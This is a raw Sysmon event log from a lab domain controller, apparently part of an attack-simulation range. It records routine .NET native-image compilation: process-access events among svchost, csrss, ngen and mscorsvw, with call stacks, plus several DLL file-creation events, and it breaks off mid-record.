13:25:38.368 10341000x80000000000000008056Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:38.196{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4652-6000-E203-000000009A01}2192C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008055Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:38.181{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4652-6000-E203-000000009A01}2192C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008054Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:38.181{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4652-6000-E203-000000009A01}2192C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008053Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:38.103{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4652-6000-E103-000000009A01}4128C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008052Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:38.087{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4652-6000-E103-000000009A01}4128C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008051Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:38.087{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4652-6000-E103-000000009A01}4128C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008050Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:25:37.993{08A6967A-4651-6000-E003-000000009A01}4124C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\101c-0\Microsoft.Transactions.Bridge.dll2021-01-14 13:25:37.993 10341000x80000000000000008073Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:39.806{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4653-6000-E703-000000009A01}2876C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008072Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:39.790{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4653-6000-E703-000000009A01}2876C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008071Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:39.790{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4653-6000-E703-000000009A01}2876C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008070Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:39.306{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4653-6000-E603-000000009A01}3968C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008069Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:39.290{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4653-6000-E603-000000009A01}3968C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008068Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:39.290{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4653-6000-E603-000000009A01}3968C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008067Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:25:39.212{08A6967A-4652-6000-E503-000000009A01}4708C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1264-0\Microsoft.VisualBasic.Activities.Compiler.dll2021-01-14 13:25:39.212 11241100x80000000000000008074Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:25:40.915{08A6967A-4653-6000-E703-000000009A01}2876C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\b3c-0\Microsoft.VisualBasic.Compatibility.dll2021-01-14 13:25:40.915 10341000x80000000000000008103Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:41.946{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4655-6000-F003-000000009A01}4288C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008102Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:41.931{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4655-6000-F003-000000009A01}4288C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008101Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:41.931{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4655-6000-F003-000000009A01}4288C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008100Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:41.884{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4655-6000-EF03-000000009A01}2432C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008099Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:41.868{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4655-6000-EF03-000000009A01}2432C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008098Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:41.868{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4655-6000-EF03-000000009A01}2432C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008097Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:41.790{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4655-6000-EE03-000000009A01}5040C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008096Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:41.775{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4655-6000-EE03-000000009A01}5040C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008095Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:41.775{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4655-6000-EE03-000000009A01}5040C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008094Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:41.712{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4655-6000-ED03-000000009A01}2332C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008093Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:41.697{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4655-6000-ED03-000000009A01}2332C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008092Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 